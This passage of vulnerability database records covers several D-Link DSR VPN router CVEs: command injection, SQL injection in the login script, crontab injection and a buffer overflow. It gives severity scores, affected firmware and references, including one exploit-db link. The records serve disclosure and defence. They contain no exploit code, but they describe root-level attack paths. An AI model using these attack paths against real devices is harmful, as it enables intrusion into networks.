"value": "Una falta de comprobaci\u00f3n de entrada y controles de acceso en Lua CGI en enrutadores D-Link DSR VPN, puede resultar en una entrada arbitraria que es pasada a las API de comando del sistema, resultando en una ejecuci\u00f3n de comandos arbitrarios con privilegios root.\u0026#xa0;Esto afecta a DSR-150, DSR-250, DSR-500 y DSR-1000AC con versiones de firmware 3.14 y 3.17"
}
],
"id": "CVE-2020-25757",
"lastModified": "2024-11-21T05:18:40.930",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 6.5,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-12-15T20:15:16.183",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.dlink.com/en/security-bulletin"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
},
{
"lang": "en",
"value": "CWE-78"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-02-11 12:15
Modified
2024-11-21 01:58
Severity ?
Summary
Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dsr-150_firmware | * | |
| dlink | dsr-150 | - | |
| dlink | dsr-150n_firmware | * | |
| dlink | dsr-150n | - | |
| dlink | dsr-250_firmware | * | |
| dlink | dsr-250 | - | |
| dlink | dsr-250n_firmware | * | |
| dlink | dsr-250n | - | |
| dlink | dsr-500_firmware | * | |
| dlink | dsr-500 | - | |
| dlink | dsr-500n_firmware | * | |
| dlink | dsr-500n | - | |
| dlink | dsr-1000_firmware | * | |
| dlink | dsr-1000 | - | |
| dlink | dsr-1000n_firmware | * | |
| dlink | dsr-1000n | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2BD73A85-9D52-4389-A555-D6FDB737AE59",
"versionEndExcluding": "1.08b44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2F9246BA-7F85-4564-B1B5-03BBBF9E2F35",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A6953E43-A7B5-4F35-BF7D-CE75FB2FA96D",
"versionEndExcluding": "1.05b64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "729C8468-E3D3-4089-B095-A41C719E9F8C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "51C91D3D-52F0-405F-B652-45DFC3C0C673",
"versionEndExcluding": "1.08b44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "702F0FE2-5E5A-4E2B-8B7A-A0C84FF74F4E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A6763ED3-B6F2-4BC4-88DC-DDF383A40761",
"versionEndExcluding": "1.08b44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E8754060-E58E-4A9A-AB59-0279E8BC793A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E80E081B-1FB5-4B37-A054-7F6D3A507B47",
"versionEndExcluding": "1.08b77",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "ABF00635-340E-4116-8B4A-46138C13C9C3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C49E10FB-39AA-4193-8EFE-815EE72ADA6E",
"versionEndExcluding": "1.08b77",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4B085DCB-4804-43ED-8634-0B4EB8DCD750",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "93C7AF3E-A7B6-47D6-A3DD-26E28398843B",
"versionEndExcluding": "1.08b77",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AFF423A8-2E0B-4618-B384-5C97B4315B88",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F33EBB05-D58C-47C0-9EB7-D0F03C027169",
"versionEndExcluding": "1.08b77",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3CE07EC6-89F9-4E76-A5CE-B8EA28727F9A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua."
},
{
"lang": "es",
"value": "M\u00faltiples vulnerabilidades de inyecci\u00f3n SQL en dispositivos D-Link DSR-150 con versi\u00f3n de firmware anterior a 1.08B44; DSR-150N con versiones de firmware anteriores a 1.05B64; DSR-250 y DSR-250N con versiones de firmware anteriores a 1.08B44; y DSR-500, DSR-500N, DSR-1000 y DSR-1000N con versiones de firmware anteriores a 1.08B77, permiten a atacantes remotos ejecutar comandos SQL arbitrarios por medio de la contrase\u00f1a para (1) la funci\u00f3n login.authenticate en los archivos share/lua/5.1/teamf1lualib/login.lua o (2) cautivePortal.lua."
}
],
"id": "CVE-2013-5945",
"lastModified": "2024-11-21T01:58:28.210",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-02-11T12:15:11.757",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Broken Link"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.exploit-db.com/exploits/30061"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Broken Link"
],
"url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.exploit-db.com/exploits/30061"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-12-15 20:15
Modified
2024-11-21 05:18
Severity ?
Summary
An issue was discovered on D-Link DSR-250 3.17 devices. Insufficient validation of configuration file checksums could allow a remote, authenticated attacker to inject arbitrary crontab entries into saved configurations before uploading. These entries are executed as root.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| dlink | dsr-150_firmware | * | |
| dlink | dsr-150 | - | |
| dlink | dsr-150n_firmware | * | |
| dlink | dsr-150n | - | |
| dlink | dsr-250_firmware | * | |
| dlink | dsr-250 | - | |
| dlink | dsr-250n_firmware | * | |
| dlink | dsr-250n | - | |
| dlink | dsr-500_firmware | * | |
| dlink | dsr-500 | - | |
| dlink | dsr-500n_firmware | * | |
| dlink | dsr-500n | - | |
| dlink | dsr-500ac_firmware | * | |
| dlink | dsr-500ac | - | |
| dlink | dsr-1000_firmware | * | |
| dlink | dsr-1000 | - | |
| dlink | dsr-1000n_firmware | * | |
| dlink | dsr-1000n | - | |
| dlink | dsr-1000ac_firmware | * | |
| dlink | dsr-1000ac | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "93C5755D-5EB7-449E-81D9-20DBA0F36345",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
"matchCriteriaId": "2F9246BA-7F85-4564-B1B5-03BBBF9E2F35",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3AE6313B-F71A-4AE4-8778-E30A93B1942B",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "729C8468-E3D3-4089-B095-A41C719E9F8C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1ABEF03D-2411-4B84-BB67-831DC0164C9D",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "702F0FE2-5E5A-4E2B-8B7A-A0C84FF74F4E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "834CDDBF-DC00-40FD-86C1-9AF2A42BB317",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E8754060-E58E-4A9A-AB59-0279E8BC793A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "64D78EB2-B98D-4196-B678-BF43227770F2",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "ABF00635-340E-4116-8B4A-46138C13C9C3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A56B78EB-01FB-472A-B147-F2DF9E1C70E1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "4B085DCB-4804-43ED-8634-0B4EB8DCD750",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-500ac_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CC42D575-0178-43EF-814F-DE6D738FB2A5",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-500ac:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC082E6B-E33F-4A69-A9B7-5E4D2D03C996",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "19A81670-E7DA-4179-A0A5-00938299BF6C",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AFF423A8-2E0B-4618-B384-5C97B4315B88",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "82F0849C-8622-4839-BE2B-DCDE9CE7B257",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3CE07EC6-89F9-4E76-A5CE-B8EA28727F9A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:dlink:dsr-1000ac_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E7F64A55-D6BF-4440-8336-22E5C1BF36D0",
"versionEndIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:dlink:dsr-1000ac:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3DD4F77B-72B4-4261-884C-8F17B52A4643",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered on D-Link DSR-250 3.17 devices. Insufficient validation of configuration file checksums could allow a remote, authenticated attacker to inject arbitrary crontab entries into saved configurations before uploading. These entries are executed as root."
},
{
"lang": "es",
"value": "Se detect\u00f3 un problema en los dispositivos D-Link DSR-250 versi\u00f3n 3.17.\u0026#xa0;Una comprobaci\u00f3n insuficiente de checksums del archivo de configuraci\u00f3n, podr\u00eda permitir a un atacante autenticado remoto inyectar entradas crontab arbitrarias en las configuraciones guardadas antes de cargarlas.\u0026#xa0;Estas entradas son ejecutadas como root"
}
],
"id": "CVE-2020-25758",
"lastModified": "2024-11-21T05:18:41.153",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-12-15T20:15:16.243",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.dlink.com/en/security-bulletin"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-354"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
CVE-2024-57376 (GCVE-0-2024-57376)
Vulnerability from cvelistv5
Published
2025-01-28 00:00
Modified
2025-01-29 15:39
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Buffer Overflow vulnerability in D-Link DSR-150, DSR-150N, DSR-250, DSR-250N, DSR-500N, DSR-1000N from 3.13 to 3.17B901C allows unauthenticated users to execute remote code execution.
References
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-57376",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-01-29T15:38:54.186044Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "CWE-120 Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-01-29T15:39:34.881Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Buffer Overflow vulnerability in D-Link DSR-150, DSR-150N, DSR-250, DSR-250N, DSR-500N, DSR-1000N from 3.13 to 3.17B901C allows unauthenticated users to execute remote code execution."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-01-28T21:46:18.934Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://www.dlink.com/en/security-bulletin/"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2024-57376",
"datePublished": "2025-01-28T00:00:00.000Z",
"dateReserved": "2025-01-09T00:00:00.000Z",
"dateUpdated": "2025-01-29T15:39:34.881Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2020-25757 (GCVE-0-2020-25757)
Vulnerability from cvelistv5
Published
2020-12-15 19:27
Modified
2024-08-04 15:40
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
A lack of input validation and access controls in Lua CGIs on D-Link DSR VPN routers may result in arbitrary input being passed to system command APIs, resulting in arbitrary command execution with root privileges. This affects DSR-150, DSR-250, DSR-500, and DSR-1000AC with firmware 3.14 and 3.17.
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.dlink.com/en/security-bulletin | x_refsource_MISC | |
| https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195 | x_refsource_MISC | |
| https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/ | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T15:40:36.937Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A lack of input validation and access controls in Lua CGIs on D-Link DSR VPN routers may result in arbitrary input being passed to system command APIs, resulting in arbitrary command execution with root privileges. This affects DSR-150, DSR-250, DSR-500, and DSR-1000AC with firmware 3.14 and 3.17."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-12-15T19:27:32",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2020-25757",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A lack of input validation and access controls in Lua CGIs on D-Link DSR VPN routers may result in arbitrary input being passed to system command APIs, resulting in arbitrary command execution with root privileges. This affects DSR-150, DSR-250, DSR-500, and DSR-1000AC with firmware 3.14 and 3.17."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.dlink.com/en/security-bulletin",
